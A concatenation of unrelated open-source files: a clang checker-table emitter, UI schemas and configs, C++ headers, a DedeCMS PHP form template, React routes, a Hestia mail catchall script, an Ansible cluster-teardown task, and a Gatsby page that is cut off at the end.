for (unsigned i = 0, e = checkers.size(); i != e; ++i) {
Record *R = checkers[i];
Record *package = nullptr;
if (DefInit *
DI = dyn_cast<DefInit>(R->getValueInit("ParentPackage")))
package = DI->getDef();
if (!isCheckerNamed(R) && !package)
PrintFatalError(R->getLoc(), "Checker '" + R->getName() +
"' is neither named, nor in a package!");
if (isCheckerNamed(R)) {
// Create a pseudo-group to hold this checker.
std::string fullName = getCheckerFullName(R);
GroupInfo &info = groupInfoByName[fullName];
info.Hidden = R->getValueAsBit("Hidden");
recordGroupMap[R] = &info;
info.Checkers.insert(R);
} else {
recordGroupMap[package]->Checkers.insert(R);
}
Record *currR = isCheckerNamed(R) ? R : package;
// Insert the checker and its parent packages into the subgroups set of
// the corresponding parent package.
while (DefInit *DI
= dyn_cast<DefInit>(currR->getValueInit("ParentPackage"))) {
Record *parentPackage = DI->getDef();
recordGroupMap[parentPackage]->SubGroups.insert(currR);
currR = parentPackage;
}
// Insert the checker into the set of its group.
if (DefInit *DI = dyn_cast<DefInit>(R->getValueInit("Group")))
recordGroupMap[DI->getDef()]->Checkers.insert(R);
}
// If a package is in group, add all its checkers and its sub-packages
// checkers into the group.
for (unsigned i = 0, e = packages.size(); i != e; ++i)
if (DefInit *DI = dyn_cast<DefInit>(packages[i]->getValueInit("Group")))
addPackageToCheckerGroup(packages[i], DI->getDef(), recordGroupMap);
typedef std::map<std::string, const Record *> SortedRecords;
typedef llvm::DenseMap<const Record *, unsigned> RecToSortIndex;
SortedRecords sortedGroups;
RecToSortIndex groupToSortIndex;
OS << "\n#ifdef GET_GROUPS\n";
{
for (unsigned i = 0, e = checkerGroups.size(); i != e; ++i)
sortedGroups[checkerGroups[i]->getValueAsString("GroupName")]
= checkerGroups[i];
unsigned sortIndex = 0;
for (SortedRecords::iterator
I = sortedGroups.begin(), E = sortedGroups.end(); I != E; ++I) {
const Record *R = I->second;
OS << "GROUP(" << "\"";
OS.write_escaped(R->getValueAsString("GroupName")) << "\"";
OS << ")\n";
groupToSortIndex[R] = sortIndex++;
}
}
OS << "#endif // GET_GROUPS\n\n";
OS << "\n#ifdef GET_PACKAGES\n";
{
SortedRecords sortedPackages;
for (unsigned i = 0, e = packages.size(); i != e; ++i)
sortedPackages[getPackageFullName(packages[i])] = packages[i];
for (SortedRecords::iterator
I = sortedPackages.begin(), E = sortedPackages.end(); I != E; ++I) {
const Record &R = *I->second;
OS << "PACKAGE(" << "\"";
OS.write_escaped(getPackageFullName(&R)) << "\", ";
// Group index
if (DefInit *DI = dyn_cast<DefInit>(R.getValueInit("Group")))
OS << groupToSortIndex[DI->getDef()] << ", ";
else
OS << "-1, ";
// Hidden bit
if (isHidden(R))
OS << "true";
else
OS << "false";
OS << ")\n";
}
}
OS << "#endif // GET_PACKAGES\n\n";
OS << "\n#ifdef GET_CHECKERS\n";
for (unsigned i = 0, e = checkers.size(); i != e; ++i) {
const Record &R = *checkers[i];
OS << "CHECKER(" << "\"";
std::string name;
if (isCheckerNamed(&R))
name = getCheckerFullName(&R);
OS.write_escaped(name) << "\", ";
OS << R.getName() << ", ";
OS << getStringValue(R, "DescFile") << ", ";
OS << "\"";
OS.write_escaped(getStringValue(R, "HelpText")) << "\", ";
// Group index
if (DefInit *DI = dyn_cast<DefInit>(R.getValueInit("Group")))
OS << groupToSortIndex[DI->getDef()] << ", ";
else
OS << "-1, ";
// Hidden bit
if (isHidden(R))
OS << "true";
else
OS << "false";
OS << ")\n";
}
OS << "#endif // GET_CHECKERS\n\n";
unsigned index = 0;
for (std::map<std::string, GroupInfo>::iterator
I = groupInfoByName.begin(), E = groupInfoByName.end(); I != E; ++I)
I->second.Index = index++;
// Walk through the packages/groups/checkers emitting an array for each
// set of checkers and an array for each set of subpackages.
OS << "\n#ifdef GET_MEMBER_ARRAYS\n";
unsigned maxLen = 0;
for (std::map<std::string, GroupInfo>::iterator
I = groupInfoByName.begin(), E = groupInfoByName.end(); I != E; ++I) {
maxLen = std::max(maxLen, (unsigned)I->first.size());
llvm::DenseSet<const Record *> &checkers = I->second.Checkers;
if (!checkers.empty()) {
OS << "static const short CheckerArray" << I->second.Index << "[] = { ";
// Make the output order deterministic.
std::map<int, const Record *> sorted;
for (llvm::DenseSet<const Record *>::iterator
I = checkers.begin(), E = checkers.end(); I != E; ++I)
sorted[(*I)->getID()] = *I;
for (std::map<int, const Record *>::iterator
I = sorted.begin(), E = sorted.end(); I != E; ++I)
OS << checkerRecIndexMap[I->second] << ", ";
OS << "-1 };\n";
}
llvm::DenseSet<const Record *> &subGroups = I->second.SubGroups;
if (!subGroups.empty()) {
OS << "static const short SubPackageArray" << I->second.Index << "[] = { ";
// Make the output order deterministic.
std::map<int, const Record *> sorted;
for (llvm::DenseSet<const Record *>::iterator
I = subGroups.begin(), E = subGroups.end(); I != E; ++I)
sorted[(*I)->getID()] = *I;
for (std::map<int, const Record *>::iterator
I = sorted.begin(), E = sorted.end(); I != E; ++I) {
OS << recordGroupMap[I->second]->Index << ", ";
}
OS << "-1 };\n";
}
}
OS << "#endif // GET_MEMBER_ARRAYS\n\n";
OS << "\n#ifdef GET_CHECKNAME_TABLE\n";
for (std::map<std::string, GroupInfo>::iterator
I = groupInfoByName.begin(), E = groupInfoByName.end(); I != E; ++I) {
// Group option string.
OS << " { \"";
OS.write_escaped(I->first) << "\","
<< std::string(maxLen-I->first.size()+1, ' ');
if (I->second.Checkers.empty())
OS << "0, ";
else
OS << "CheckerArray" << I->second.Index << ", ";
// Subgroups.
if (I->second.SubGroups.empty())
OS << "0, ";
else
OS << "SubPackageArray" << I->second.Index << ", ";
OS << (I->second.Hidden ? "true" : "false");
OS << " },\n";
}
OS << "#endif // GET_CHECKNAME_TABLE\n\n";
}
} // end namespace clang
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
-->
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<!-- Include section -->
<xs:include schemaLocation="urn:magento:module:Magento_Ui:view/base/ui_component/etc/definition/ui_component.xsd"/>
<xs:complexType name="componentFile">
<xs:sequence>
<xs:group ref="configurable" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="settings" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:group ref="abstractSettings"/>
<xs:group ref="componentFileSettings"/>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:sequence>
<xs:attributeGroup ref="ui_element_attributes"/>
</xs:complexType>
<xs:complexType name="formElementFile">
<xs:sequence>
<xs:element name="settings" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:group ref="componentFileSettings"/>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:sequence>
<xs:attributeGroup ref="ui_element_attributes"/>
</xs:complexType>
<xs:group name="componentFileSettings">
<xs:choice>
</xs:choice>
</xs:group>
</xs:schema>
| {
"pile_set_name": "Github"
} |
{
"prefix": "oo-ui-icon",
"intro": "@import '../../../../src/styles/common';",
"images": {
"indent": { "file": {
"ltr": "images/icons/indent-ltr.svg",
"rtl": "images/icons/indent-rtl.svg"
} },
"listBullet": { "file": {
"ltr": "images/icons/listBullet-ltr.svg",
"rtl": "images/icons/listBullet-rtl.svg"
} },
"listNumbered": { "file": {
"ltr": "images/icons/listNumbered-ltr.svg",
"rtl": "images/icons/listNumbered-rtl.svg"
} },
"outdent": { "file": {
"ltr": "images/icons/outdent-ltr.svg",
"rtl": "images/icons/outdent-rtl.svg"
} }
}
}
| {
"pile_set_name": "Github"
} |
/*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
#pragma once
#include <AzCore/Component/Component.h>
#include <AzCore/std/containers/unordered_map.h>
#include <ScriptCanvas/Execution/ExecutionBus.h>
#include <ScriptCanvas/Variable/VariableBus.h>
#include <ScriptCanvas/Variable/VariableData.h>
#include <ScriptCanvas/Core/GraphBus.h>
namespace ScriptCanvas
{
// Implements methods to add/remove/find Script Canvas Data objects associated with the Script Canvas graph
// The VariableRequestBus is address by VariableId
// The VariableGraphIequestBus bus is addressed using the UniqueId of the ScriptCanvas Graph Component at runtime and editor time
// (NOTE: this is not the EntityId that the Graph is attached to, but an ID that is tied only to the Graph Component)
// In addition at Editor time the VariableGraphRequestBus can be address using the EntityId that this component is attached.
class GraphVariableManagerComponent
: public AZ::Component
, protected GraphConfigurationNotificationBus::Handler
, protected GraphVariableManagerRequestBus::Handler
, protected VariableRequestBus::MultiHandler
{
public:
AZ_COMPONENT(GraphVariableManagerComponent, "{825DC28D-667D-43D0-AF11-73681351DD2F}");
static void Reflect(AZ::ReflectContext* context);
GraphVariableManagerComponent();
GraphVariableManagerComponent(ScriptCanvasId scriptCanvasId);
~GraphVariableManagerComponent() override;
void Init() override;
void Activate() override;
void Deactivate() override;
// GraphConfigurationNotificationBus
void ConfigureScriptCanvasId(const ScriptCanvasId& scriptCanvasId) override;
////
ScriptCanvasId GetScriptCanvasId() const { return m_scriptCanvasId; }
//// VariableRequestBus
GraphVariable* GetVariable() override;
const GraphVariable* GetVariableConst() const override { return const_cast<GraphVariableManagerComponent*>(this)->GetVariable(); }
Data::Type GetType() const override;
AZStd::string_view GetName() const override;
AZ::Outcome<void, AZStd::string> RenameVariable(AZStd::string_view newVarName) override;
//// GraphVariableManagerRequestBus
AZ::Outcome<VariableId, AZStd::string> CloneVariable(const GraphVariable& variableConfiguration) override;
AZ::Outcome<VariableId, AZStd::string> RemapVariable(const GraphVariable& variableConfiguration) override;
AZ::Outcome<VariableId, AZStd::string> AddVariable(AZStd::string_view name, const Datum& value) override;
AZ::Outcome<VariableId, AZStd::string> AddVariablePair(const AZStd::pair<AZStd::string_view, Datum>& nameValuePair) override;
VariableValidationOutcome IsNameValid(AZStd::string_view key) override;
bool RemoveVariable(const VariableId& variableId) override;
AZStd::size_t RemoveVariableByName(AZStd::string_view variableName) override;
GraphVariable* FindVariable(AZStd::string_view propName) override;
GraphVariable* FindVariableById(const VariableId& variableId) override;
GraphVariable* FindFirstVariableWithType(const Data::Type& dataType, const AZStd::unordered_set< ScriptCanvas::VariableId >& blacklistId) override;
Data::Type GetVariableType(const VariableId& variableId) override;
const GraphVariableMapping* GetVariables() const override;
AZStd::string_view GetVariableName(const VariableId&) const override;
AZ::Outcome<void, AZStd::string> RenameVariable(const VariableId&, AZStd::string_view) override;
bool IsRemappedId(const VariableId& remappedId) const override;
////
GraphVariableMapping* GetVariables();
const VariableData* GetVariableDataConst() const override { return &m_variableData; }
VariableData* GetVariableData() override { return &m_variableData; }
void SetVariableData(const VariableData& variableData) override;
void DeleteVariableData(const VariableData& variableData) override;
protected:
static void GetProvidedServices(AZ::ComponentDescriptor::DependencyArrayType& provided)
{
provided.push_back(AZ_CRC("ScriptCanvasVariableService", 0x819c8460));
}
void RegisterCopiedVariableRemapping(const VariableId& originalValue, const VariableId& remappedId);
void UnregisterUncopiedVariableRemapping(const VariableId& remappedId);
VariableId FindCopiedVariableRemapping(const VariableId& variableId) const;
VariableData m_variableData;
private:
ScriptCanvasId m_scriptCanvasId;
AZStd::unordered_map< VariableId, VariableId > m_copiedVariableRemapping;
};
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo $cfg_soft_lang; ?>">
<title>编辑评论</title>
<style type="text/css">
<!--
body {
background-image: url(images/allbg.gif);
}
-->
</style>
<link href="css/base.css" rel="stylesheet" type="text/css">
</head>
<body>
<table width="98%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#D6D6D6">
<tr>
<td width="100%" height="24" colspan="2" background="images/tbg.gif">
<strong><a href="<?php echo $ENV_GOBACK_URL; ?>"><u>表单管理</u></a> >> 编辑评论:</strong> </td>
</tr>
<tr>
<td height="167" colspan="2" align="center" bgcolor="#FFFFFF" valign="top">
<form name="form1" method="post" enctype="multipart/form-data" action="diy_list.php?action=edit&diyid=<?php echo $diy->diyid ?>&id=<?php echo $row['id'] ?>&do=2">
<input type="hidden" name="dopost" value="edit" />
<input type="hidden" name="id" value="<?php echo $row['id']; ?>" />
<table width="100%" border="0" cellpadding="3" cellspacing="1" style="text-align:left;">
<?php
$formfields = '';
foreach($fieldlist as $field=>$fielddata)
{
$allowhtml = array('htmltext');
if($row[$field]=='') continue;
if($fielddata[1]=='img')
{
$row[$field] = "<input name='photo' type='file' /> <a href='{$row[$field]}' target='_blank'><img src='images/channeladd.gif' border='0' /> 浏览原图</a> <a href='diy_list.php?action=delete&diyid=$diy->diyid&id=$row[id]&do=1&name=$field'>删除原图</a>\r\n";
}
else if($fielddata[1]=='addon')
{
$row[$field] = "<input name='file' type='file' /> <a href='{$row[$field]}' target='_blank'><img src='images/channeladd.gif' border='0' /> 浏览原附件</a> <a href='diy_list.php?action=delete&diyid=$diy->diyid&id=$row[id]&do=1&name=$field'>删除原附件</a>";
}
else
{
if(!in_array($fielddata[1],$allowhtml)){
$row[$field] = dede_htmlspecialchars($row[$field]);
$row[$field] = "<input type='text' name='".$field."' value='".$row[$field]."'/>";
}
}
echo '<tr bgcolor="#ffffff"><td width="20%" height="24">'.$fielddata[0].':'.'</td><td width="80%">'.$row[$field].'</td></tr>';
$formfields .= $formfields == ''? $field.','.$fielddata[1] : ';'.$field.','.$fielddata[1];
}
echo "<input type='hidden' name='dede_fields' value='".$formfields."'>";
?>
<tr bgcolor="#FFFFFF">
<td height="40" width='600' colspan="2" align="center">
<input type="submit" name="Submit1" class='coolbg np' value="保存更改" />
<input type="button" name="Submit2" class='coolbg np' value="不理返回" onClick="location='<?php echo $ENV_GOBACK_URL; ?>';" />
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</body>
</html> | {
"pile_set_name": "Github"
} |
import AsyncComponent from '../components/AsyncComponent'
const Home = AsyncComponent(() => import('../page/home'))
const Topic = AsyncComponent(() => import('../page/topic'))
const Catelog = AsyncComponent(() => import('../page/catelog'))
const Cart = AsyncComponent(() => import('../page/cart'))
const Mine = AsyncComponent(() => import('../page/mine'))
const Categorys = AsyncComponent(() => import('../page/categorys'))
const Goods = AsyncComponent(() => import('../page/goods'))
const BrandDetail = AsyncComponent(() => import('../page/brandDetail'))
const TopicDetail = AsyncComponent(() => import('../page/topicDetail'))
const Comment = AsyncComponent(() => import('../page/comment'))
const TopicCommentWrite = AsyncComponent(() =>
import('../page/topicCommentWrite')
)
const GoodsSearch = AsyncComponent(() => import('../page/goodsSearch'))
const Collect = AsyncComponent(() => import('../page/collect'))
const Address = AsyncComponent(() => import('../page/address'))
const OrderConfirm = AsyncComponent(() => import('../page/orderConfirm'))
const routes = [
{
name: '首页',
isTab: true,
link: '/home',
component: Home
},
{
name: '专题',
link: '/topic',
isTab: true,
component: Topic
},
{
name: '分类',
link: '/catelog',
isTab: true,
component: Catelog
},
{
name: '购物车',
link: '/cart',
isTab: true,
component: Cart
},
{
name: '我的',
link: '/mine',
isTab: true,
component: Mine
},
{
name: '分类商品',
link: '/categorys/:id',
isTab: false,
component: Categorys
},
{
name: '商品详情',
link: '/goods/:id',
isTab: false,
component: Goods
},
{
name: '制造商详情',
link: '/brandDetail/:id',
isTab: false,
component: BrandDetail
},
{
name: '专题详情',
link: '/topicDetail/:id',
isTab: false,
component: TopicDetail
},
{
name: '评论页',
link: '/comment/:id',
isTab: false,
component: Comment
},
{
name: '写专题评论',
link: '/topicCommentWrite/:id',
isTab: false,
component: TopicCommentWrite
},
{
name: '商品查询',
link: '/goodsSearch',
isTab: false,
component: GoodsSearch
},
{
name: '收藏商品',
link: '/collect',
isTab: false,
component: Collect
},
{
name: '地址管理',
link: '/address',
isTab: false,
component: Address
},
{
name: '订单确认',
link: '/orderConfirm',
isTab: false,
component: OrderConfirm
}
]
export default routes
| {
"pile_set_name": "Github"
} |
/* -*- mode: C; c-basic-offset: 4; intent-tabs-mode: nil -*-
*
* Sifteo Thundercracker simulator
* Micah Elizabeth Scott <[email protected]>
*
* Copyright <c> 2011 Sifteo, Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#ifndef _CUBE_HARDWARE_H
#define _CUBE_HARDWARE_H
#include <algorithm>
#include "cube_cpu.h"
#include "cube_radio.h"
#include "cube_adc.h"
#include "cube_accel.h"
#include "cube_spi.h"
#include "cube_i2c.h"
#include "cube_mdu.h"
#include "cube_ccp.h"
#include "cube_rng.h"
#include "cube_lcd.h"
#include "cube_backlight.h"
#include "cube_flash.h"
#include "cube_neighbors.h"
#include "cube_cpu_core.h"
#include "cube_debug.h"
#include "vtime.h"
#include "tracer.h"
#include "flash_storage.h"
namespace Cube {
/*
* This file simulates the hardware peripherals that we have directly
* attached to the 8051.
*/
static const uint8_t ADDR_PORT = REG_P0;
static const uint8_t MISC_PORT = REG_P1;
static const uint8_t BUS_PORT = REG_P2;
static const uint8_t CTRL_PORT = REG_P3;
static const uint8_t ADDR_PORT_DIR = REG_P0DIR;
static const uint8_t MISC_PORT_DIR = REG_P1DIR;
static const uint8_t BUS_PORT_DIR = REG_P2DIR;
static const uint8_t CTRL_PORT_DIR = REG_P3DIR;
static const uint8_t MISC_TOUCH = (1 << 7);
static const uint8_t CTRL_LCD_DCX = (1 << 0);
static const uint8_t CTRL_FLASH_LAT1 = (1 << 1);
static const uint8_t CTRL_FLASH_LAT2 = (1 << 2);
static const uint8_t CTRL_3V3_EN = (1 << 3);
static const uint8_t CTRL_DS_EN = (1 << 4);
static const uint8_t CTRL_FLASH_WE = (1 << 5);
static const uint8_t CTRL_FLASH_OE = (1 << 6);
// RFCON bits
static const uint8_t RFCON_RFCKEN = 0x04;
static const uint8_t RFCON_RFCSN = 0x02;
static const uint8_t RFCON_RFCE = 0x01;
class Hardware {
public:
CPU::em8051 cpu;
VirtualTime *time;
LCD lcd;
Backlight backlight;
SPIBus spi;
I2CBus i2c;
ADC adc;
MDU mdu;
CCP ccp;
Flash flash;
Neighbors neighbors;
RNG rng;
bool init(VirtualTime *masterTimer, const char *firmwareFile,
FlashStorage::CubeRecord *flashStorage);
void reset();
void fullReset();
ALWAYS_INLINE unsigned id() const {
return cpu.id;
}
uint64_t getHWID() const;
ALWAYS_INLINE unsigned getNeighborID() const {
// This is assigned by the cube firmware, and stored for our perusal in an unused SFR.
return cpu.mSFR[0xA1 - 0x80];
}
ALWAYS_INLINE void tick(bool *cpuTicked=NULL) {
CPU::em8051_tick(&cpu, 1, cpu.sbt, cpu.mProfileData != NULL, Tracer::isEnabled(), cpu.mBreakpoint != 0, cpuTicked);
hardwareTick();
}
ALWAYS_INLINE unsigned tickFastSBT(unsigned tickBatch=1) {
/*
* Assume at compile-time that we're in SBT mode, and no debug features are active.
* Also try to aggressively skip ticks when possible. The fastest code is code that never runs.
* Returns the number of ticks that may be safely batched next time.
*
* Also note that we calculate our remaining clock cycles using 32-bit math, and we blindly
* truncate the output of remaining(). This is intentional; normally remaining() will fit in
* 32 bits, but even if it does cause overflow the worst case is that we'll end up skipping
* fewer ticks than possible. So, this is always safe, and it's highly important for performance
* when we're running on 32-bit platforms.
*
* Assumes the caller has already checked isSleeping().
*/
CPU::em8051_tick(&cpu, tickBatch, true, false, false, false, NULL);
hardwareTick();
return std::min(std::min(cpu.mTickDelay, (unsigned)cpu.prescaler12),
(unsigned)hwDeadline.remaining());
}
void lcdPulseTE() {
if (time != NULL)
lcd.pulseTE(hwDeadline);
}
void setAcceleration(float xG, float yG, float zG);
void setTouch(bool touching);
bool isDebugging();
void initVCD(VCDWriter &vcd);
// SFR side-effects
void sfrWrite(int reg);
int sfrRead(int reg);
void debugByte();
void graphicsTick();
ALWAYS_INLINE void setRadioClockEnable(bool e) {
rfcken = e;
}
ALWAYS_INLINE bool isRadioClockRunning() {
return rfcken && !cpu.powerDown;
}
uint32_t getExceptionCount();
void incExceptionCount();
void logWatchdogReset();
void traceExecution();
bool testWakeOnPin();
ALWAYS_INLINE uint8_t readFlashBus() {
if (LIKELY(flash_drv))
cpu.mSFR[BUS_PORT] = flash.dataOut();
return cpu.mSFR[BUS_PORT];
}
private:
ALWAYS_INLINE void hardwareTick()
{
/*
* A big chunk of our work can happen less often than every
* clock cycle, as determined by a simple deadline tracker.
*
* We also trigger hardware writes via a simpler (and shorter
* to inline) method, just by writing to a byte in the CPU
* struct. This is used by the inline SFR callbacks
* in cube_cpu_callbacks.h.
*
* We can safely assume that needHardwareTick is set by CPU code,
* before hardwareTick executes, and that it won't be set during
* hwDeadlineWork().
*/
if (hwDeadline.hasPassed() || cpu.needHardwareTick)
hwDeadlineWork();
if (testWakeOnPin())
CPU::wake_from_sleep(&cpu, 0x80);
}
int16_t scaleAccelAxis(float g);
void hwDeadlineWork();
TickDeadline hwDeadline;
uint8_t lat1;
uint8_t lat2;
uint8_t bus;
uint8_t prev_ctrl_port;
uint8_t flash_drv;
uint8_t rfcken;
uint32_t exceptionCount;
};
}; // namespace Cube
#endif
| {
"pile_set_name": "Github"
} |
// (C) Copyright Dave Abrahams, Steve Cleary, Beman Dawes, Howard
// Hinnant & John Maddock 2000.
// Use, modification and distribution are subject to the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt).
//
// See http://www.boost.org/libs/type_traits for most recent version including documentation.
#ifndef BOOST_TT_ADD_CV_HPP_INCLUDED
#define BOOST_TT_ADD_CV_HPP_INCLUDED
#include <boost/config.hpp>
namespace boost {
// * convert a type T to a const volatile type - add_cv<T>
// this is not required since the result is always
// the same as "T const volatile", but it does suppress warnings
// from some compilers:
#if defined(BOOST_MSVC)
// This bogus warning will appear when add_volatile is applied to a
// const volatile reference because we can't detect const volatile
// references with MSVC6.
# pragma warning(push)
# pragma warning(disable:4181) // warning C4181: qualifier applied to reference type ignored
#endif
template <class T> struct add_cv{ typedef T const volatile type; };
#if defined(BOOST_MSVC)
# pragma warning(pop)
#endif
template <class T> struct add_cv<T&>{ typedef T& type; };
} // namespace boost
#endif // BOOST_TT_ADD_CV_HPP_INCLUDED
| {
"pile_set_name": "Github"
} |
{% extends "base.html" %}
{% load smartmin i18n %}
{% block content %}
<div class="row">
<div class="col-md-7 col-md-offset-2">
<div class="alert alert-danger">
<div class="page-header"><h2>{% trans "Login Failure" %}</h2></div>
<p>
{% blocktrans %}
Sorry, you cannot log in at this time because we received {{failed_login_limit}} incorrect login attempts.
{% endblocktrans %}
</p>
{% if lockout_timeout >= 0 %}
<p>
{% blocktrans %}
Please wait {{lockout_timeout}} minutes before to try log in again.
{% endblocktrans %}
</p>
{% endif %}
{% if allow_email_recovery %}
<p>{% trans "Alternatively, you can fill out the form below to have your password reset via e-mail." %}</p>
{% else %}
<p>{% trans "Please contact the website administrator to have your password reset." %}</p>
{% endif %}
</div>
</div>
</div>
{% if allow_email_recovery %}
<div class="row" >
<div class="col-md-7 col-md-offset-2">
<form class="form-inline" method="post" action="{% url 'users.user_forget' %}">
{% csrf_token %}
<fieldset>
<label>{% trans "Email Address" %}</label>
<input class="col-md-4" type="text" name="email">
<input type="submit" value='{% trans "Recover" %}' class="btn btn-primary">
</fieldset>
</form>
</div>
</div>
{% endif %}
{% endblock %}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# info: add mail domain catchall account
# options: USER DOMAIN EMAIL
#
# The function enables catchall account for incoming emails.
#----------------------------------------------------------#
# Variable&Function #
#----------------------------------------------------------#
# Argument definition
user=$1
domain=$2
domain_idn=$2
email="$3"
# Includes
source $HESTIA/func/main.sh
source $HESTIA/func/domain.sh
source $HESTIA/conf/hestia.conf
# Additional argument formatting
format_domain
format_domain_idn
#----------------------------------------------------------#
# Verifications #
#----------------------------------------------------------#
check_args '3' "$#" 'USER DOMAIN EMAIL'
is_format_valid 'user' 'domain' 'email'
is_system_enabled "$MAIL_SYSTEM" 'MAIL_SYSTEM'
is_object_valid 'user' 'USER' "$user"
is_object_unsuspended 'user' 'USER' "$user"
is_object_valid 'mail' 'DOMAIN' "$domain"
is_object_unsuspended 'mail' 'DOMAIN' "$domain"
is_object_value_empty 'mail' 'DOMAIN' "$domain" '$CATCHALL'
# Perform verification if read-only mode is enabled
check_hestia_demo_mode
#----------------------------------------------------------#
# Action #
#----------------------------------------------------------#
# Adding catchall alias
if [[ "$MAIL_SYSTEM" =~ exim ]]; then
sed -i "/*@$domain_idn:/d" $HOMEDIR/$user/conf/mail/$domain/aliases
echo "*@$domain_idn:$email" >> $HOMEDIR/$user/conf/mail/$domain/aliases
fi
#----------------------------------------------------------#
# Hestia #
#----------------------------------------------------------#
# Adding antispam in config
update_object_value 'mail' 'DOMAIN' "$domain" '$CATCHALL' "$email"
# Logging
log_history "added $email as catchall email for $domain"
log_event "$OK" "$ARGUMENTS"
exit
| {
"pile_set_name": "Github"
} |
---
- block:
- debug:
msg: "Deleting {{ cluster_dir }} using user {{ username }}"
- name: destroy terraform resources (openshift-install destroy cluster)
environment:
PATH: /usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin:/usr/local/bin:/usr/local/bin:/root/bin
shell: openshift-install destroy cluster --dir={{ cluster_dir }}
become: yes
become_user: "{{ username }}"
register: destroyr
async: 1200
poll: 30
retries: 3
until: destroyr is succeeded
always:
- name: pack an archive of everything
archive:
path: "{{ cluster_dir }}"
dest: /tmp/{{ guid }}_{{ cluster_dir | basename }}.tar.gz
become: yes
become_user: "{{ username }}"
- name: get archive of environment target dir
fetch:
flat: yes
src: /tmp/{{ guid }}_{{ cluster_dir | basename }}.tar.gz
dest: "{{ hostvars.localhost.output_dir }}/{{ env_type }}_{{ guid }}_{{ guid }}_{{ cluster_dir | basename }}.tar.gz"
become: yes
become_user: "{{ username }}"
| {
"pile_set_name": "Github"
} |
erp5_base
erp5_immobilisation | {
"pile_set_name": "Github"
} |
import React from 'react';
import { FORM_URL } from '../constants';
export const wizardButtonText = 'Start the Higher-Level Review request';
export const wizardLabels = {
compensation: 'A disability compensation claim',
other: 'A benefit claim other than compensation',
no: 'No',
yes: 'Yes',
};
export const claimDescription = `What type of claim are you requesting for a
Higher-Level Review?`;
export const legacyDescription = (
<p>
Are any of the decisions you would like to request a Higher-Level Review for
currently in the <a href="/disability/file-an-appeal/">legacy appeals</a>{' '}
process?
</p>
);
export const startPageText = 'Request a Higher-Level Review';
export const alertHeading = `You’ll need to submit a paper form to request a
Higher-Level Review`;
export const AlertOtherTypeContent = (
<>
<p>
We’re sorry. You can only request a Higher-Level Review online for
compensation claims right now.
</p>
<p>
To request a Higher-Level Review for another benefit type, please fill out
a Decision Review Request: Higher-Level Review (VA Form 20-0996).
</p>
<a href={FORM_URL}>Download VA Form 20-0996 (PDF)</a>
</>
);
export const AlertLegacyContent = (
<>
<p>
If you have a decision date before Februrary 19, 2019 and received a
Statement of the Case (SOC) or Supplemental Statement of the Case (SSOC)
because you had filed an appeal under the old (or former) appeals system,
you’ll have to opt-in to the new decision review process via a submitted
paper form.
</p>
<p>
To opt in, please fill out a Decision Review Request: Higher-Level Review
(VA Form 20-0996) and check “opt-in from SOC/SSOC” in box 15 of the paper
form.
</p>
<a href={FORM_URL}>Download VA Form 20-0996 (PDF)</a>
<p>
If you had not filed a legacy appeal within a year of the decision dated
before Februrary 19, 2019, you will need to{' '}
<a href="/decision-reviews/supplemental-claim/">
file a Supplemental Claim
</a>
.
</p>
</>
);
| {
"pile_set_name": "Github"
} |
<div class="leftlistinfo">
<div class="listinfo">
<div class="title"><label for="id_case_id_set">Case ID(s) :</label></div>
<div class="listinfo_input">{{ quick_form.case_id_set }}</div>
</div>
</div>
<div class="rightlistinfo">
</div>
<div class='clear'></div>
| {
"pile_set_name": "Github"
} |
import React from 'react'
import Link from 'gatsby-link'
import { StyleSheet, TouchableOpacity, Text, View } from 'react-native'
import { Video } from 'expo-av'
const styles = StyleSheet.create({
box: { padding: 10, margin: 10, borderWidth: 1, borderColor: 'black' },
text: { fontWeight: 'bold', color: 'red' },
button: {
marginVertical: 40,
paddingVertical: 20,
paddingHorizontal: 10,
borderWidth: 1,
borderColor: 'black',
backgroundColor: 'lightgrey',
alignItems: 'center',
},
buttonText: { fontWeight: 'bold', color: 'black' },
})
const RNWPage = () => (
<View style={styles.box}>
